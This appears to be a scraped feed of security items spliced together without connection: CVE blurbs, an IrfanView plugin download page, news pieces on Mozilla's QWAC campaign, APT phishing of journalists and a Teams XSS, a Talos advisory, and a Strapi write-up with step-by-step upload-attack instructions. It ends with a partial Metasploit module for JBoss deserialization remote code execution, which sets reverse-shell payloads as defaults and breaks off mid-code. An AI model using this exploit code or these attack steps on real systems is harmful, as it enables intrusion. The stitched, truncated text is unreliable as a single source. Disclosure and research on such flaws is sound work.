An issue was discovered in DSK DSKNet 2.16.136.0 and 2.17.136.5. The Touch settings allow unrestricted file upload (and consequently Remote Code Execution) via PDF upload with PHP content and a .php extension. The attacker must hijack or obtain privileged user access to the Parameters page in order to exploit this issue. (That can be easily achieved by exploiting the Broken Access Control with further Brute-force attack or SQL Injection.) The uploaded file is stored within the database and copied to the sync web folder if the attacker visits a certain .php?action= page.

CVE-2022-24688: DSK Systems

IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000002cba.

**Please always use the current IrfanView and PlugIn version.**

  
**How to install IrfanView PlugIns?**

1.  Download all PlugIns, see below
2.  Click on the PlugIn file (irfanview\_plugins\_XYZ\_setup.exe)
3.  PlugIns will be installed into IrfanView "PlugIns" directory 

**Note:** Install 32-bit PlugIns to IrfanView-32 and 64-bit PlugIns to IrfanView-64 folder. **DO NOT** mix the PlugIns and IrfanView bit versions. 

**The current PlugIns version is: 4.60** 

**Note:** A normal IrfanView version includes the following (most important) PlugIns: **Effects, Paint, Icons, Slideshow-EXE, RegionCapture, JPG-Transform, Video, Metadata, Tools.**

  **Check the 64-bit page for 64-bit PlugIns.**  

1.  **You can download ALL (32-bit) PlugIns as one large EXE (recommended):**  **FossHub - download IrfanView plugins Installer**
    
    Alternative download site: iview460\_plugins\_setup.exe (20.2 MB, installer)  
    (SHA-256 checksum: 0a967a007c296944575962e66586bfada7c32012675dc1a0ae1cec982bb755f8)
    
  
3.  **You can download ALL (32-bit) PlugIns as one large ZIP (for experienced users!):**  **FossHub - download IrfanView plugins ZIP**
    
    Alternative download site: iview460\_plugins.zip (18.4 MB)  
    (SHA-256 checksum: 628a088067c0e4baf02ab87698fc0bf66b2b59cb1eee9ff08c95535e741cd654)
    

**Special PlugIn: "IrfanView Shell Extension":**

This PlugIn shows a **Context menu for some IrfanView operations in Windows Explorer or other file managers.**   
You can select several files and: Play slideshow, Load files in Thumbnails window, Start JPG Lossless Rotation, Convert images to another format, Save filenames as TXT, Create multipage TIF or PDF, Create panorama image. (current version: 1.06)

Download: https://www.irfanview.net/plugins/irfanview\_shell\_extension\_plugin.exe (Installer)  
(SHA-256 checksum: b9828e236b26626b46fe20ad31208140fc572819ba86c2cba75cbd2c7724ebef)

or 

https://www.irfanview.net/plugins/irfanview\_shell\_extension.zip (ZIP, for experienced users!)  
(SHA-256 checksum: 2112f85a917b2eca90eaa047a8c3b22e0157f13e83971aee679d955b2ff1047d)

**You can download the (32-bit) PlugIns as 4 separate ZIP files (for experienced users!):**

1.  iv\_mmedia.zip. Contains these PlugIns: IV\_Player, Med, Mp3, Burning, Nero, Quicktime, Real Audio, SoundPlayer.
2.  iv\_formats.zip.  Contains these PlugIns: Awd, B3d, BabaCAD4Image, CamRAW, Crw, CADImage, Dicom, DjVu, Dpx, Ecw, Exr, Flash, Flif, Formats, Fpx, Hdp, Ics, ImPDF, ImPDN, JPEG2000, Jpeg\_LS, Jpm, Mng, MrSID, PDF, PhotoCD, OptiPNG, Postscript, Sff, Svg, Wbz, WebP, Wsq, Xcf.
3.  iv\_effects.zip.   Contains these PlugIns: Filter Sandbox, Film Simulation, Filter Factory, Filters Unlimited.
4.  iv\_misc.zip.      Contains these PlugIns: Email, FaceDetect, Ftp, Lcms.

**PlugIns updated after the version 4.60:**

*   CamRAW Plugin (4.60) - ZIP (32 bit) or ZIP (64 bit) - Support for Olympus OM-1 RAW format

**Available PlugIns and current versions:**

*   **AltaLux** - (version **1.08**): allows IrfanView to use AltaLux image effect
*   **AWD** - (version **2.0.0.0**): allows IrfanView to read Artweaver files
*   **B3D** - (version **4.56**): allows IrfanView to read BodyPaint 3D files
*   **BabaCAD4Image** - (version **1.3.2**): allows IrfanView to to read DXF and DWG CAD files
*   **BURNING** - (version **4.51**): allows IrfanView to burn slideshow to a CD/DVD/BD (Windows XP SP3 or later required)
*   **BURNINGOLD** - (version **4.36**): allows IrfanView (32-bit) to burn slideshow to a CD (Windows XP or later required, Nero option can burn Data DVD and VCD)
*   **CADImage** - (version **14.0.0.1**): allows IrfanView to read DXF/DWG/HPGL/CGM/SVG files (Shareware, third party plugin)  
    Newest 32-bit versions under: https://www.cadsofttools.com/download/irfanviewplugins.zip , newest 64-bit versions: https://www.cadsofttools.com/download/irfanviewplugins\_x64.zip
*   **CamRAW** - (version **4.58**): allows IrfanView to to read Digital Camera RAW files  
    (formats: DNG, EEF, NEF, ORF, RAF, MRW, DCR, SRF/ARW, PEF, X3F)
*   **CRW** - (version **4.58**): allows IrfanView (32-bit) to read Canon CRW/CR2 files (high resolution image version) **  
    Note:** this PlugIn requires additional Canon DLLs. You can download these DLLs with the Canon ZoomBrowser program: https://www.canon.com/ or try here: https://www.irfanview.info/plugins/canon\_crw.zip (check "Readme.txt" for instructions and install!)
*   **DICOM** - (version **4.60**): allows IrfanView to read Dicom formats (DCM, ACR, IMA)
*   **DJVU** - (version **4.56**): allows IrfanView to read DJVU format
*   **DPX** - (version **4.56**): allows IrfanView to read DPX/CIN (Digital Picture Exchange/Cineon) format
*   **ECW** - (version **4.56**): allows IrfanView to read/write ECW files (Enhanced Compressed Wavelet)
*   **EFFECTS** - (version **4.59**): contains image effects and allows IrfanView to load Adobe Photoshop 8BF filters **Note:** some nice (fixed menu) Adobe 8BF Plugins/effects can be downloaded/installed from: https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.zip **  
    Note:** some older/special 8BFs may require additional system DLLs: Msvcrt10.dll and/or Plugin.dll. You can download these DLLs here: https://www.irfanview.info/plugins/8bf\_tools.zip (check "Readme.txt" for instructions and install!)
*   **EMAIL** - (version **4.59**): allows IrfanView to send images as emails
*   **EXR** - (version **4.56**): allows IrfanView to read EXR files
*   **FACEDETECT** - (version **2.00**): allows IrfanView to use the Face Detection feature from Thumbnails window  
    If you have a modern graphic card which can be used for additional calculations, you can try the GPU version of the plugin: https://www.irfanview.info/plugins/facedetect\_gpu.zip
*   **FILM\_SIMULATION** - (version **1.0.0.0**): allows IrfanView to apply some Film Simulation effects **  
    Note:** this PlugIn needs additional CLUT files, download/install from: https://www.irfanview.net/plugins/irfanview\_film\_sim\_plugin.zip
*   **FILTER\_FACTORY** - (version **4.53**): allows IrfanView to use Filter Factory 8BF files (Photoshop PlugIns)
*   **FLASH** - (version **2.2.0.1**): allows IrfanView to read Flash/Shockwave/FLV format
*   **FLIF** - (version **4.56**): allows IrfanView to read FLIF (Free Lossless Image) format
*   **FORMATS** - (version **4.60**): allows IrfanView to read some rare image formats  
    (formats: PCX, QOI, PSP, DDS, G3, RAS, IFF/LBM, BioRAD, Mosaic, XBM, XPM, GEM-IMG, SGI, RLE, WBMP, TTF, FITS, PIC, MAG, WAD, WAL, CAM, SFW, YUV, PVR, SIF and old/retro formats from Amiga, Atari, C64, ZX Spectrum etc.)
*   **FPX** - (version **4.56**): allows IrfanView (32-bit) to read FlashPix files
*   **FTP** - (version **4.50**): allows IrfanView to transfer files from Thumbnails window using FTP
*   **FILTERS\_UNLIMITED** - (version **3.20**): allows IrfanView (32-bit) to use Filters Unlimited files (Photoshop PlugIns and filters)
*   **HDP** - (version **4.56**): allows IrfanView to read Jpeg-XR/HDP/WDP (Microsoft HD Photo) files
*   **ICONS** - (version **4.30**): additional icons for IrfanView file associations
*   **ICS** - (version **4.56**): allows IrfanView (32-bit) to read ICS files (Image Cytometry Standard)
*   **IMPDF** - (version **0.90**): allows IrfanView (32-bit) to write PDF files (Portable Document Format)
*   **IMPDN** - (version **1.16**): allows IrfanView to read PDN files (Paint.NET File Format)
*   **IRFANVIEW\_SANDBOX** - (version **1.3.0.14**): allows IrfanView to use JewelScript Effects/Filters
*   **IV\_PLAYER** - (version **4.54**): allows IrfanView to play video/sound/audio-cd files using Windows Media Player
*   **JPEG2000** - (version **4.56**): allows IrfanView to read/write JPEG 2000 files
*   **JPEG\_LS** - (version **4.56**): allows IrfanView to read/write JPEG-LS files
*   **JPEG\_XL** - (version **4.59.1**): allows IrfanView to read/write JPEG-XL files
*   **JPEGQS** - (version **2020-05-17**): allows IrfanView to read JPG files using QuantSmooth method
*   **JPG\_TRANSFORM** - (version **4.59**): allows IrfanView to support lossless JPG operations (rotation/crop/cleaning, EXIF date editing, EXIF thumb update)
*   **JPM** - (version **4.56**): allows IrfanView to read/write JPM files
*   **LCMS** - (version **4.58**): allows IrfanView to use color management
*   **MED** - (version **3.31**): allows IrfanView (32-bit) to play MED/OctaMED audio files
*   **METADATA** - (version **4.60**): allows IrfanView to handle EXIF/IPTC/Comment information from compatible files
*   **MNG** - (version **4.57**): allows IrfanView to read/play MNG/JNG files
*   **MP3** - (version **4.52**): allows IrfanView to play MP3/MP2/MP1 files
*   **MRC** - (version **3.70**): allows IrfanView (32-bit) to read MRC files
*   **MR-SID** - (version **4.56**): allows IrfanView to read LizardTech's SID files **  
    Note:** this PlugIn needs additional DLLs (for IrfanView 32-bit only), download/install from: https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.zip
*   **NERO** - (version **4.20**): allows IrfanView (32-bit) to burn slideshow to data or Video CD, using Nero Burning ROM software
*   **OCR\_KADMOS** - (version **4.4y**): adds OCR features to IrfanView PlugIn download: https://www.irfanview.info/plugins/kadmos/**  
    Note: the OCR PlugIn works only with IrfanView 32-bit.**
*   **OPTIPNG** - (version **4.59**): this PlugIn allows optimized PNG saving
*   **PAINT** - (version **0.4.13.57**): allows IrfanView to to paint lines, circles, arrows, straighten image etc.
*   **PDF** - (version **4.58**): allows IrfanView to read/save PDF files (Portable Document Format)
*   **PHOTO-CD** - (version **3.00**): allows IrfanView to read Kodak PCD files (high resolutions)
*   **POSTSCRIPT** - (version **4.59**): allows IrfanView to read EPS/PS/PDF files (using Ghostscript, take the **32-bit (!) EXE installer**, like "gs926w32.exe") or Ghostscript **64-bit for IrfanView 64-bit** (like "gs926w64.exe").
*   **QUICKTIME** - (version **4.56**): allows IrfanView to play/read Apple Quicktime files
*   **REAL-AUDIO** - (version **3.37**): allows IrfanView (32-bit) to play Real-Audio RA files
*   **REGIONCAPTURE** - (version **2.4.3**): allows IrfanView to capture a rectangle area of the screen
*   **SFF** - (version **4.56**): allows IrfanView to read SFF (Structured Fax) Files
*   **SLIDESHOW** - (version **4.57**): allows IrfanView to create presentations in EXE or SCR format (standalone executable/screen saver)
*   **SOUND\_PLAYER** - (version **4.39**): allows IrfanView to play OGG files (Ogg Vorbis)
*   **STUB\_LOADER** - (version **1.2.5**): allows loading of old (32 bit) PlugIns in IrfanView 64 bit (used also for scanning in IrfanView-64)
*   **SVG** - (version **0.85**): allows IrfanView to read SVG (Scalable Vector Graphic) files
*   **TOOLS** - (version **4.58**): contains some additional functions/features for IrfanView  
    (and some special formats, like: HEIC, AVIF; with installed codecs/extensions)
*   **VIDEO** - (version **4.57**): allows IrfanView to play many video/sound formats
*   **WBZ** - (version **1.01**): allows IrfanView to read WebShots (WBZ/WBC/WB1) files
*   **WEBP** - (version **4.57**): allows IrfanView to read/write WEBP (Weppy Format) files
*   **WPG** - (version **3.1.2**): allows IrfanView to read WPG (version 1) files
*   **WSQ** - (version **2019.10.15**): allows IrfanView to read WSQ (Wavelet Scaler Quantization) files
*   **XCF** - (version **0.1.4**): allows IrfanView to read XCF files

**For developers:** If you want to write your own plugins for IrfanView (support for new image formats or effects (please no private formats)), please send me an email for details.

CVE-2020-23563: IrfanView PlugIns

Mozilla’s message to MEPs appears to be gaining traction, says senior public policy manager at the non-profit

Mozilla’s message to MEPs appears to be gaining traction, says senior public policy manager at the non-profit

Mozilla has stepped up its efforts to dissuade EU lawmakers from forcing web browsers to recognize the validity of contentious web certificates created by the bloc.

The non-profit architect of the Firefox browser has launched a campaign urging Members of the European Parliament (MEPs) to amend proposals tabled by the European Commission (EC) that would oblige browsers to accept Qualified Website Authentication Certificates (QWACs).

**QWACkers**

The EU created QWACs in 2014 to validate a website’s professed identity and therefore – in theory – protect users from fraud, malware, and surveillance.

However, QWACs, which are based on somewhat discredited extended validation certificates, have failed to gain much of a foothold in the web ecosystem in the eight years since their introduction.

Mozilla argues that QWACs are inferior to the existing, longstanding web authentication ecosystem, and that the EC proposal would bypass “the critical first line of defense against cybercrime on the web”.

With MEPs expected to vote on the proposal in October, Mozilla launched a #SecurityRiskAhead campaign yesterday (July 13) with a carnival-style duck-fishing game pitched outside the European Parliament in Brussels.

BACKGROUND EU web authentication plan threatens to undercut browser-led system, detractors claim

Owen Bennett, Mozilla’s senior public policy manager for Europe, told The Daily Swig that Mozilla’s message appeared to be gaining traction.

The QWACs amendment – article 45.2 – was deleted from a recent draft report (PDF) for the EU’s digital identity framework in order to accommodate revisions, and various security-related amendments have already been tabled in parliament, he said.

An open letter urging a rethink, published in March by 38 security experts, was “a big turning point” in persuading MEPs, Bennett believes.

The Internet Society, Electronic Frontier Foundation (EFF), and the world’s largest certificate authority, Let’s Encrypt, have also campaigned against the proposal.

**Trusted system**

The browser-led web authentication system in place sees certificated websites using the TLS-encrypted HTTPS protocol and displaying a padlock icon in the URL address bar to advertise their secure status.

DON’T FORGET TO READ HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

Web – or SSL – certificates are currently issued by more than 100 certificate authorities (CAs), which are vetted by Mozilla and other leading browser makers, including Google, Microsoft, and Apple.

Critics of QWACs, which are issued by ‘Trust Service Providers’ (TSPs) approved by governments of EU member states, argue that they cannot draw on comparable technical expertise and resources. They can also point to the fact that hundreds of millions of web users happily submit payment card details online as evidence that the status quo is widely, and justifiably, trusted.

Mozilla takes its message direct to MEPs by pitching up outside the European Parliament

Mozilla CSO Marshall Erwin warned that if the well-intentioned EC proposal were “copied elsewhere, the regulation will give the tools to governments to carry out state-sponsored surveillance of internet traffic”.

Mozilla cited large-scale snooping campaigns by Iran’s theocracy in 2011 and the governments of Kazakhstan and Mauritius in 2020 and 2021 respectively as examples of the activity the regulation could enable.

**‘Ceiling on website security’**

“Article 45 puts a ceiling on website security,” said Bennet. “It says you must accept QWACs, not put in place any additional protections, and not take action when a certificate authority is found to be compromised. For us that creates an untenable risk to Firefox users.”

The EU’s digital identity framework will be incorporated into the electronic Identification, Authentication, and Trust Services (eIDAS) regulation, which was enacted in 2014 to facilitate the emergence of a European internal market for trust services.

RECOMMENDED Decentralized Identifiers: Everything you need to know about the next-gen web ID tech

Bennett said the campaign was not seeking to “blow up the whole regulation”, but that Mozilla simply wanted “some small tweaks” to give browsers the “discretion to take action when an entity issuing QWACs doesn’t meet existing security standards or poses a security risk”.

A spokesperson for the European Commission told The Daily Swig:

The eIDAS Regulation is technology neutral. QWACs were introduced in 2014 as a means to enhance trust and reduce fraud and is used to ensure trusted transactions in the PSD2 environment (as a means for Payment Service Providers to identify).

The concerns raised by the browser community is based on an understanding of the technical implementation of the obligation to recognise QWACs which is not supported by the Commission legal proposal. The Commission proposal intends to achieve recognition of QWACs in the browser environment, which can be achieved without interfering with existing root store policies and web browser security requirement. There is no reason why a certificate issued as trustworthy according to EU law should not be recognised as such by the browser community.

In collaboration with the relevant standardisation bodies and the availability of commonly and globally accepted standards, the implementing act referred to in Article 45 will set out the technical specifications/references to the applicable standards which will enable the recognition of QWACs in accordance with the above.

YOU MIGHT ALSO LIKE Oblivious DNS-over-HTTPS offers privacy enhancements to secure lookup protocol

Crunch time for EU web authentication plan as Mozilla launches campaign to protect status quo

Since 2021, various state-aligned threat groups have turned up their targeting of journalists to siphon data and credentials and also track them.

Since 2021, various state-aligned threat groups have turned up their targeting of journalists to siphon data and credentials and also track them.

Targeted phishing attacks are traced to multiple threat actors who have each independently focused on stealing credentials and sensitive data and tracking the geolocation of journalists.

In a Thursday report by Proofpoint, researchers outline individual efforts by advance persistent threat (APT) groups who they say are aligned with China, North Korea, Iran and Turkey. Attacks began in early 2021 and are ongoing, researchers said.

According to the report, the APTs are acting independently of each other but share the same overall goal of targeting journalists. Tactics are also similar, with threat actors targeting email and social-media accounts as phishing inroads in cyberespionage campaigns.

Often posing as journalists themselves, the threat actors have focused on phishing campaigns with the goal of credential harvesting, theft of data helpful to specific regimes and digital surveillance of political journalists.

****APT Tradecraft: The Phish**  **

The attacks typically involved some type of social engineering to lower the guard of targets in order to coax them to download and execute various malicious payloads onto their personal digital devices, researchers said. Lures included emails and messages sent via various social media platforms on topics related to their area of political focus, researchers said.

_\[**FREE On-demand Event**: Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office. **WATCH HERE**.\]_

In various instances the attackers would lie low, post malware infection, in order to gain persistence on a recipient’s network and conduct lateral network reconnaissance and propagate additional malware infections within the target’s network.

Secondary tactics included tracking or surveilling journalists. Proofpoint said adversaries used web beacons planted on journalists’ devices to carry out the surveillance.

****Journalist Have Been Targeted Before, But Not Like This****

While the latest report tracks some of the most recent activity against journalists, targeting this group of individuals certainly isn’t novel, given the type of information to which journalists have access to when it comes to political and socio-economic issues, they noted.

“APT actors, regardless of their state affiliation, have and will likely always have a mandate to target journalists and media organizations and will use associated personas to further their objectives and collection priorities,” researchers wrote.

Moreover, this focus on media by APTs is unlikely to ever wane, which should inspire journalists to do everything they can to secure their communications and sensitive data, they said.

****China-backed APTs Strike in U.S.****

Between January and February 2021, Proofpoint researchers identified five campaigns by

Chinese APT TA412, also known also as Zirconium, targeting US-based journalists, most notably those covering U.S. politics and national security during events that gained international attention, researchers said.

The way the campaigns were crafted depended upon the current U.S. political climate, and attackers switched targets depending on which journalists were covering topics in which the Chinese government has interest, they said.

One reconnaissance phishing campaign occurred in the days immediately preceding the Jan. 6 attack on the U.S. Capitol building, with attackers focusing specifically on White House and Washington-based correspondents during this time, they said.

Attacker used subject lines pulled from recent U.S. news articles related to pertinent political topics at the time, including actions of former President Donald Trump, U.S. political movements related to China and, more recently, the U.S. stance and involvement in Russia’s war against Ukraine, researchers said.

****Varying Payloads****

In the observed campaigns, Zirconium used as its payload web beacons, a tactic consistent with malicious cyberespionage campaigns against journalists that the APT has conducted since 2016, researchers said.

Web beacons, commonly referred to as tracking pixels, tracking beacons, or web bugs, embed a hyperlinked non-visible object within the body of an email that, when enabled, attempts to retrieve a benign image file from an actor-controlled server.

“Proofpoint researchers assess these campaigns have been intended to validate targeted emails are active and to gain fundamental information about the recipients’ network environments,” they wrote.

Researchers observed another Chinese-backed APT, TA459, in late April 2022 targeting media personnel in Southeast Asia with emails containing a malicious Royal Road RTF attachment, if opened, would install and execute Chinoxy malware–a backdoor that is used to gain persistence on a victim’s machine.

The targeted entity was responsible for reporting on the Russia-Ukraine conflict, which aligns with TA459’s historic mandate of collecting on intelligence matters related to Russia and Belarus, researchers noted.

****Fake Job Opportunities from North Korea****

Researchers also observed North Korea-aligned TA404—better known as Lazarus–in early 2022 targeting a U.S.-based media organization with phishing attacks that appeared to offer job opportunities from reputable companies to journalists, they reported. The attack is reminiscent of a similar one against engineers that the group mounted in 2021.

“It started with reconnaissance phishing that used URLs customized to each recipient,” researchers wrote of the recent phishing campaign. “The URLs impersonated a job posting with landing pages designed to look like a branded job posting site.”

The sites were fraudulent, however, and the URLs were armed to relay identifying information about the computer, or device someone was working from to allow the host to keep track of the intended target, researchers said.

****Turkey-backed APT Targets Twitter Credentials****

APTs with alleged ties to Turkey’s government have also targeted journalists, with one campaign including one “prolific threat actor” TA482 observed by Proofpoint. According to researchers, the APT has been actively targeting journalists since early 2022, via Twitter accounts in efforts to steal credentials from mainly U.S.-based journalists and media organizations.

The motive behind the group appears to be to spread propaganda in support of President Recep Tayyip Erdogan the Turkish ruling political party, Justice and Development Party, though this cannot be confirmed with certainty, researchers noted.

The campaigns use phishing emails typically related to Twitter security—alerting a user to a suspicious log-in–to gain the recipient’s attention, taking them to a credential harvesting page that impersonates Twitter if they click on a link.

****Iranian APTs Harvest Credentials****

Iran-linked APTs have been particularly active on their assault against journalists and newspapers, typically posing as journalists themselves in attacks to engage in surveillance against targets and harvest their credentials, Proofpoint has found.

One of the most active perpetrators of these attacks is TA453, known as Charming Kitten, a notorious group aligned with intelligence collection efforts of Iran’s Islamic Revolutionary Guard Corp, Proofpoint said.

This group is notorious for masquerading as journalists from around the world to target journalists, academics and researchers alike by engaging in discussion about

foreign policy or other topics related to the Middle East, after which they will be invited to a virtual meetings via a customized, but benign PDF.

However, the PDF—typically delivered from file hosting services—almost always contains a link to a URL shortener and IP tracker that redirects targets to actor-controlled credential-harvesting domains, researchers said.

TA456, also known as Tortoiseshell, is another Iran-aligned threat actor that routinely poses as media organizations to target journalists with newsletter-themed emails containing web beacons that can track targets.

Another Iranian state-sponsored actor, TA457, hides behind the persona of a fake media organization called “iNews Reporter” to deliver malware to public relations personnel

for companies located in the United States, Israel and Saudi Arabia, researchers said. Between September 2021 and March 2022, Proofpoint observed campaigns by the prolific threat actor that occurred approximately every two to three weeks, they said.

In one campaign that occurred in March 2022, TA457 sent an email with the ironic subject line “Iran Cyber War” that ultimately dropped a remote access trojan on victims’ machines. The campaign was seen targeting both individual and group email addresses at a handful of Proofpoint customers involved in energy, media, government and manufacturing, researchers reported.

**_\[FREE On-demand Event: Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office. WATCH HERE.\]_**

Journalists Emerge as Favored Attack Target for APTs

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

A security researcher has found that attackers could abuse the popular sticker feature in Microsoft Teams to conduct cross-site scripting (XSS) attacks.

Microsoft Teams, alongside comparable teleconferencing services including Zoom, have experienced a surge in popularity over the past few years.

The Covid-19 pandemic forced organizations to adopt work-from-home models whenever possible. In the aftermath, employees have often been given the option of either staying remote or going hybrid.

With so many users, any vulnerability in Microsoft Teams could have widespread impact. As such, cybersecurity researchers, including Gais Cyber Security’s senior cybersecurity specialist Numan Turle, have examined the software for potential flaws.

**Sticky subject**

In 2021, Turle uncovered CVE-2021-24114. Issued a CVSS score of 5.7, the bug was discovered in the preview process of images sent via Teams to leak Skype tokens (PDF) and trigger an account takeover vulnerability in Teams iOS.

A year on, the researcher decided to examine Microsoft Teams’ sticker function for new security issues.

**RELATED** Vulnerability in Microsoft Teams granted attackers access to emails, messages, and personal files

When a sticker is sent via Teams, the platform converts it into an image and uploads the content as ‘RichText/HTML’ in the subsequent message.

Turle inspected the HTML request using Burp Suite and tried out typical attributes – to no avail, due to the protections offered by Microsoft’s Content Security Policy (CSP).

CSP is designed to mitigate a range of common web attacks, including XSS.

However, after plugging the CSP into Google’s CSP Evaluator tool, the researcher found a CSP defect – the field was flagged as unsafe, which paved the way for potential HTML injection attacks against multiple domains.

**Trying a different angle**

Microsoft had plugged these security holes via Azure domain changes. So, after digging deeper and inspecting Teams in-browser, Turle uncovered a JavaScript element, , that could be used as an alternative.

jQuery with Angular is a JavaScript framework for managing HTML and CSS interactions. However, this version was out of date and vulnerabilities in the outdated version (1.5.14) – could be utilized to bypass the CSP.

Read more of the latest security vulnerability news

After crafting a malicious iframe with help from HTML encoding, the researcher was able to create a malicious payload, sent via the stickers function in Teams, to trigger XSS, obtained through user interaction.

Turle disclosed the XSS issue to Microsoft on January 6. The vulnerability was patched in March and the researcher was awarded a $6,000 bug bounty.

_The Daily Swig_ has reached out to Gais Cyber Security and Microsoft and we will update when we hear back.

Full details can be found in a technical blog post from Turle.

**INTERVIEW** Vivaldi browser founder Jon von Tetzchner puts privacy at the center of development

Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.

**Strapi v4.1.12****Vulnerability Explanation:**

An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file

**Attack Vectors:**

*   After uploading a file containing malicious content, when the user opens the link to the file, it will execute.

**Payload :**

https://github.com/bypazs/GrimTheRipper/blob/main/GrimTheRipperTeam.pdf

**Tested on:**

1.  Strapi Version 4.1.12
2.  Google Chrome Version 102.0.5005.61 (Official Build) (64-bit)

**Affected Component:**

*   On the Media Library page, it is allowed to upload files containing malicious content to the system.

**Steps to attack:**

1.  Log in with a user that has permission to upload files.
2.  Click on the "Media Library" menu, then click on "+ Add new assets".
3.  Click on the "Browse files: button, and then select the prepared file containing malicious content.
4.  Then click on the "Upload 1 asset to the library" button to upload the file to the system.
5.  Click edit in the corner of the file and click copy link.
6.  Paste the link to a new tab, it will show that the payload XSS was executed.

**Discoverer:**

 Grim The Ripper Team by SOSECURE Thailand

**Medium:**

*   https://grimthereaperteam.medium.com/strapi-v4-1-12-unrestricted-file-upload-b993bfd07e4e

**Disclosure Timeline:**

*   2022–05–29: Vulnerability discovered.
*   2022–05–29: Vulnerability reported to the MITRE corporation.
*   2022–07–14: CVE has been reserved.
*   2022–05–29: Public disclosure of the vulnerability.

Reference:

1.  https://github.com/strapi/strapi
2.  https://strapi.io/
3.  https://github.com/bypazs/strapi
4.  https://grimthereaperteam.medium.com/strapi-v4-1-12-unrestricted-file-upload-b993bfd07e4e

CVE-2022-32114: GitHub - bypazs/CVE-2022-32114: An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 
Cisco Talos recently discovered two use-after-free vulnerabilities in Adobe Acrobat Reader DC that could allow an attacker to eventually gain the ability to execute arbitrary code.  
Acrobat is...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw._ 

Cisco Talos recently discovered two use-after-free vulnerabilities in Adobe Acrobat Reader DC that could allow an attacker to eventually gain the ability to execute arbitrary code.  

Acrobat is one of the most popular PDF reader software options available currently. It includes the ability to read and process JavaScript to give PDFs greater interactivity and customization options for users. This vulnerability exists in the way Acrobat Reader processes JavaScript. 

TALOS-2022-1516 (CVE-2022-34221) is a type confusion vulnerability that is triggered if the user opens a PDF with specially crafted, malicious JavaScript embedded. Object misuse can cause memory corruption, which can lead to arbitrary code execution. TALOS-2022-1525 (CVE-2022-34230) can trigger the reuse of a freed object, which can ultimately result in arbitrary code execution, as well.

Cisco Talos worked with Adobe to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy. 

Users are advised to update the following software, which is tested and confirmed to be affected by these vulnerabilities: Adobe Acrobat Reader, version 2022.001.20085.  

The following Snort rules will detect exploitation attempts against this vulnerability: 59644, 59645, 59942 and 59943. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall management center or Snort.org.

Vulnerability Spotlight: Adobe Acrobat DC use-after-free issues could lead to arbitrary code execution 

An unauthenticated attacker with network access to the JBOSS EAP/AS versions 6.x and below Remoting Unified Invoker interface can send a serialized object to the interface to execute code on vulnerable hosts.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'JBOSS EAP/AS Remoting Unified Invoker RCE',        'Description' => %q{          An unauthenticated attacker with network access to the JBOSS          EAP/AS <= 6.x Remoting Unified Invoker interface can send a          serialized object to the interface to execute code on vulnerable hosts.        },        'Author' => [          'Joao Matos <@joaomatosf>',         # Discovery          'Marcio Almeida <@marcioalm>',      # PoC          'Heyder Andrade <@HeyderAndrade>'   # msf module        ],        'References' => [          [ 'URL', 'https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf']        ],        'DisclosureDate' => '2019-12-11',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(4446)    ])  end  def handshake_data    # MAGIC BYTES JAVA SERIALIZATION OBJECT HEADER    # AC ED: STREAM_MAGIC. Specifies that this is a serialization protocol.    # 00 05: STREAM_VERSION. The serialization version.    ['aced0005'].pack('H*')  end  def check    connect    sock.put(handshake_data)    data = sock.get_once(16)    disconnect    return Exploit::CheckCode::Appears if data == handshake_data    return Exploit::CheckCode::Safe  rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e    print_error("Error to connect #{rhost}:#{rport} : '#{e.class}' '#{e}'")    return Exploit::CheckCode::Unknown  end  # def exploit  def execute_command(cmd, _opts = {})    java_payload = generate_java_deserialization_for_command('CommonsCollections5', 'bash', cmd)    # MAGIC BYTES JBOSS PROTOCOL:    # 0x77: TC_BLOCKDATA    # 0x01: Length of TC_BLOCKDATA    # 0x16: Protocol version 22    # 0x79: TC_RESET    magic_bytes = ['77011679'].pack('H*')    payload = 